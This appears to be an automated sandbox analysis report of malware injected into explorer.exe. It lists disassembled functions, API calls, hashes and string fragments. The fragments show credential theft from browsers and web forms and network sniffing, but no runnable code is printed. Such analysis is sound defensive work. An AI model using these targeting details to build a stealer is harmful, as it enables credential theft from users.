                                  control_flow_graph 426 807c5b2-807c5ea 427 807c5ec-807c604 call 807f942 426->427 428 807c60a-807c62b socket 426->428 427->428
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: sock
                                  • API String ID: 98920635-2415254727
                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction ID: c63f6deec46a3d996e6a51eb5becea3863cdc18775ee45ecd18b133e1c239be3
                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction Fuzzy Hash: 0C01217061861C8FCB84EF1CD048B55BBE0FB59315F1545ADD45EDB266C7B0C9818B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 080742DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 431 80742dd-8074320 call 807f942 434 8074326 431->434 435 80743fa-807440e 431->435 436 8074328-8074339 SleepEx 434->436 436->436 437 807433b-8074341 436->437 438 8074343-8074349 437->438 439 807434b-8074352 437->439 438->439 440 807435c-807436a call 807ef12 438->440 441 8074354-807435a 439->441 442 8074370-8074376 439->442 440->442 441->440 441->442 443 80743b7-80743bd 442->443 444 8074378-807437e 442->444 448 80743d4-80743db 443->448 449 80743bf-80743cf call 8074e72 443->449 444->443 447 8074380-807438a 444->447 447->443 450 807438c-80743b1 call 8075432 447->450 448->436 452 80743e1-80743f5 call 80740f2 448->452 449->448 450->443 452->436
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction ID: b905baf10f82230c4c2cd3705eacdc3d25b2e154953d76354d41c15a8cd070f8
                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction Fuzzy Hash: 42316CB4A04F49DADBA4AF6980892E5B7E2FB54302F44427EC92DCA206CB709055CFD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08074412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction ID: 62efb0d7d3a929587e9557f37e8b3a96a30e2a48d18c46eeb0a9c29d3f836ffe
                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction Fuzzy Hash: BBF0C234668A4D4FD788EF2CD44567AB3D0EBA8215F44063EA58DC3264DA29C582871A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 07D7DD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction ID: 0f98a12bb944830b15d74d2d53755b39721b573670788e77127043092c8be377
                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction Fuzzy Hash: 67E15BB0518F488FC7A4EF68C484BAAF7E0FB58300F504A6E959BC7251EF30A541CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D80792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                  • API String ID: 0-2916316912
                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction ID: 20766bd4207fe10fdbf5b7779c63dc9a87c84ba24a4c13191ce4ceeb5ca265e5
                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction Fuzzy Hash: EDB17970528B48CEDB95EF68C485AEEB7F1FF98300F50451ED49AC7251EF70A4098B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7E622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction ID: 6f2b31c81e86b2875aee41872dc7720e25df88741a14fba2ee157c8183accda9
                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction Fuzzy Hash: A141B0B0A18B08CFDB14DF98A4467ADBBE2FB48700F00025ED449D7245EBB59D45CBD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D85AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                  • API String ID: 0-355182820
                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction ID: c0902f4de569e5edc72e9a927d32e237016b5c339d64a37da1273715f4920332
                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction Fuzzy Hash: 59C159B0218B09DFC799FF68D885AAAF3E1FB94304F50462E949AC7250DF30E515CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D85F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction ID: 21663f17783d2b793963378aaa1edc45455129f0a8ca3129da747b54d0d4e31f
                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction Fuzzy Hash: 5951F3B11187488FD759EF18C8812AAF7E5FB84710F501A2EE8DBC7202DBB4D506CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7F2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                  • Instruction ID: 70fa90c7127e65d2c6fc4aa9719d6978a0f6fe9f4b2b9c919203c655eb619fe6
                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                  • Instruction Fuzzy Hash: ADC180B1618A198FC798FF68D455AAAF3E1FB94300F94436D940AC7255EF30EA02C796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7F2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction ID: e5ed4af21744f0c00bf34739be90bc1336f6545718317500861c8b4e8d6b27a1
                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction Fuzzy Hash: D4C180B0618A198FC798FF68D455AAAF3E1FB94300F94436D940EC7255EF30EA02C796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D80CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                  • Instruction ID: 0f35c28eb37a73fb3c4a5aac8024fe37ea1eadeb1947a4fc946dc0f03b9ac82e
                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                  • Instruction Fuzzy Hash: A3A190B06187488BDB59EFA8D444BEEF7E5FF84300F40462DD48AD7251EF7095498786
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D80CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                  • Instruction ID: 7a07a07697576d7b96030206f04d5b0bd8aa68a96bae95bff20c5a4cc4b5f05a
                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                  • Instruction Fuzzy Hash: E1918FB06187488BDB59EFA8D444BEEF7E1FB88300F40462ED48AD7251EB7095498786
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D80352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$e$n$v
                                  • API String ID: 0-1849617553
                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                  • Instruction ID: 561040e6b80df43c8c18a83c1a8408c85fd4f8f1579e121b864cf1166a823d30
                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                  • Instruction Fuzzy Hash: A9718F71618A49CFD758EFA8C4847AAF7F1FF58304F00062ED45AD7221EB71E9458B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7BC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                  • Instruction ID: fe3ca4265a27af203c985d6ccb729e21de0cdfc8ce9ad9e911ab1120cc5c7f76
                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                  • Instruction Fuzzy Hash: BC514CB0918B4DCBDB94EFA4C045AEAF7E1FF58300F40462E959AE7254EF3095418B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7C86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4$\$dll$ion.$vers
                                  • API String ID: 0-1610437797
                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                  • Instruction ID: 427cb4502aa2cf2d6dcd6a5e8059c9a25cfa320d3356962fcf2e993c0eecd23b
                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                  • Instruction Fuzzy Hash: 03418070228B898FCBB5EF6498457EAB7E4FB98301F51462E988EC7240EF30D545C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7E4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                  • Instruction ID: 65a45f749fa87b1287451dac5a365123902f4ec55d5e9c2336769634a2097d4f
                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                  • Instruction Fuzzy Hash: EE4151B0A18E5E8FCB94EF6880957ADB7E1FB58300F80456AA80ED7210EA70D540CB86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7C432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                  • Instruction ID: d0e2b68a6b4e01c548b8fd72342d36a27454ec115a0a355399dcf7862b8b5fe3
                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                  • Instruction Fuzzy Hash: F34195B0618B498FD7A9DF2880853BAFBE1FB98300F50466F949EC3255EB70D545CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D830B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                  • Instruction ID: f89c587b5f16922e6e643fd14cc7acb1b1861daa89af9d89896e4110cb5e44c5
                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                  • Instruction Fuzzy Hash: CD31E1B151CB889FC75AEB28C0846EAF7D0FB84300F50491EE49BC7251EE30A549CB43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D830C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                  • Instruction ID: efc3834026e7c1abf1561f18c0a81073189f9574d05ea52bc8a0530a29a1abb5
                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                  • Instruction Fuzzy Hash: 7331F2B1518B48AFD75AEB28C4856EAF7D4FB94300F50491EE49BC3251EE30E54ACB43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7EFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                  • Instruction ID: 8decc4b8be04426d3e9dec53e2e9b6f5cab7526c51ab0703bda010e7afa25863
                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                  • Instruction Fuzzy Hash: 68315CB0118B498FCB94FF688495BAAB6E1FB98300F94066D944ACB255DF30C945C763
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D7EFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                  • Instruction ID: 7831264859a44d9ef4c3cf8aa7a61a5b073056e52efdfc5cb71a3ba57fef965b
                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                  • Instruction Fuzzy Hash: A5318DB0218B498FCB94FF688494BAAB7E1FF98300F94062D944ACB255DF30C945C763
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D818C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: 23259cbb800ddb492605ed06a023ae549207f0f96fe7598a715cb00300e05113
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: 1131D171614A4D8BCB45FFA8C8847EDB7E1FB58214F40022AD45EE7240DE748645C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D818BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 6dfdfd5d0b280af436150956f18fb81638a72291d93be864d5f0606ef14fc6c5
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 1C21C3B0614A4D8ACB45FFA8C8447EDBBE1FF58204F40421AD45AE7240DE7486458796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D82E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                  • Instruction ID: 4a4064ba28c43e01746f1824ded5e04178198d2e01e4246d934d5847cfa2ee7b
                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                  • Instruction Fuzzy Hash: 0F216BB0A24B0D9FDB44FFA8C0447ADFAF0FB58314F90462ED009D3600DB7495918B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D82E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                  • Instruction ID: f9680b5633b3977cf92352fd2b0c2bc29b7303416978f5686ff56d2b2555ee58
                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                  • Instruction Fuzzy Hash: 5A2148B4A24A0D9FDB48FFA8D044BE9FAF1FB58314F90462ED049E3600DB7895918B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D82FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850888480.0000000007D00000.00000040.00000001.00040000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7d00000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: auth$logi$pass$user
                                  • API String ID: 0-2393853802
                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                  • Instruction ID: 4a3ef813d42f9d7720e1d98515cab07fe0a01af6803147014fb32db4f4b16de1
                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                  • Instruction Fuzzy Hash: D521D2B0624B0D8BCB45EF9D98807EEB7F1EF88344F005619D40AEB244D7B4E9148BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:2%
                                  Dynamic/Decrypted Code Coverage:1.7%
                                  Signature Coverage:0%
                                  Total number of Nodes:589
                                  Total number of Limit Nodes:75
                                  execution_graph 81676 200f900 LdrInitializeThunk 81679 df0fd 81682 db990 81679->81682 81683 db9b6 81682->81683 81690 c9d30 81683->81690 81685 db9c2 81688 db9e6 81685->81688 81698 c8f30 81685->81698 81736 da670 81688->81736 81691 c9d3d 81690->81691 81739 c9c80 81690->81739 81693 c9d44 81691->81693 81751 c9c20 81691->81751 81693->81685 81699 c8f57 81698->81699 82164 cb1b0 81699->82164 81701 c8f69 82168 caf00 81701->82168 81703 c8f86 81710 c8f8d 81703->81710 82239 cae30 LdrLoadDll 81703->82239 81706 c8ffc 82184 cf400 81706->82184 81708 c9006 81709 dbf50 2 API calls 81708->81709 81732 c90f2 81708->81732 81711 c902a 81709->81711 81710->81732 82172 cf370 81710->82172 81712 dbf50 2 API calls 81711->81712 81713 c903b 81712->81713 81714 dbf50 2 API calls 81713->81714 81715 c904c 81714->81715 82196 cca80 81715->82196 81717 c9059 81718 d4a40 8 API calls 81717->81718 81719 c9066 81718->81719 81720 d4a40 8 API calls 81719->81720 81721 c9077 81720->81721 81722 c9084 81721->81722 81723 c90a5 81721->81723 82206 cd610 81722->82206 81724 d4a40 8 API calls 81723->81724 81726 c90c1 81724->81726 81735 c90e9 81726->81735 82240 cd6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 81726->82240 81729 c9092 82222 c8d00 81729->82222 81730 c8d00 23 API calls 81730->81732 81732->81688 81735->81730 81737 daf20 LdrLoadDll 81736->81737 81738 da68f 81737->81738 81740 c9c93 81739->81740 81790 d8b80 LdrLoadDll 81739->81790 81770 d8a30 81740->81770 81743 c9ca6 81743->81691 81744 c9c9c 81744->81743 81773 db270 81744->81773 81746 c9ce3 81746->81743 81784 c9aa0 81746->81784 81748 c9d03 81791 c9620 LdrLoadDll 81748->81791 81750 c9d15 81750->81691 81752 c9c3a 81751->81752 81753 db560 LdrLoadDll 81751->81753 82138 db560 81752->82138 81753->81752 81756 db560 